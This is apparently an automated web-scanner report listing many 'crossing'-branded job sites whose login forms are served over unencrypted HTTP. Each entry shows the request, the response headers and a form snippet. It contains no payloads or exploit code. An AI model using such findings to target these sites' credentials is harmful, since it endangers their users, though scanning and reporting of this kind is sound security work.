| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:34:24 GMT Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=3oi3tsj2ag Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 80394 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <link rel="SHORTCUT ICON" href="http://www <titl ...[SNIP]... </script> <form name="formmainlogin" action="" method="POST" onsubmit="return LoginFrm()" style="margin:0px; padding:0px;"> <input type=hidden name="clslogin_hdnaction" id="clslogin_hdnaction" value=""> ...[SNIP]... <input type="text" name="clslogin_email" onfocus="focusval(this ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.auditorcr |
| Path: | / |
| GET / HTTP/1.1 Host: www.auditorcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:52 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=16al60hefd Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:52 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 125427 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.automotiv |
| Path: | / |
| GET / HTTP/1.1 Host: www.automotivecrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:56 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=chphkc8gns Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:56 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109012 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.aviationc |
| Path: | / |
| GET / HTTP/1.1 Host: www.aviationcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:22:03 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=5ito8gdqrm Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:03 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 123144 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.bilingual |
| Path: | / |
| GET / HTTP/1.1 Host: www.bilingualcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:03 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=3jv1797bk3 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:03 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 133153 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.biotechcr |
| Path: | / |
| GET / HTTP/1.1 Host: www.biotechcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:05 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=u6vsjargff Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:05 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 119741 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.bluecolla |
| Path: | / |
| GET / HTTP/1.1 Host: www.bluecollarcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:36 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=phn4e0vehg Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:36 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 149168 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.businessa |
| Path: | / |
| GET / HTTP/1.1 Host: www.businessanalystc Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:41 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=kldqa0cqam Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 124047 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.businessd |
| Path: | / |
| GET / HTTP/1.1 Host: www.businessdevelopm Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:41 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ru1216s8gi Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 116452 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.callcente |
| Path: | / |
| GET / HTTP/1.1 Host: www.callcentercrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:44 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=prr05v672v Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:44 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 128551 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.chefcrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.chefcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:46 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ha4et9frts Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:46 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 108888 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.civilengi |
| Path: | / |
| GET / HTTP/1.1 Host: www.civilengineering Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:59 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=soga8db6sp Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:59 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 106801 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.clevelcrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.clevelcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:10 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=7grpnh4ane Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:10 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 115509 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.clinicalr |
| Path: | / |
| GET / HTTP/1.1 Host: www.clinicalresearch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:18 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=pot86ho5ls Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:18 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 101472 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.complianc |
| Path: | / |
| GET / HTTP/1.1 Host: www.compliancecrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:20 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=t20irb9usa Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:20 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 135192 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.computera |
| Path: | / |
| GET / HTTP/1.1 Host: www.computeraideddes Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:21 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=i4i09jl3sj Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:21 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 121001 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.construct |
| Path: | / |
| GET / HTTP/1.1 Host: www.constructioncrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:22 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=6c5ho2kr4a Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 131637 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.consultin |
| Path: | / |
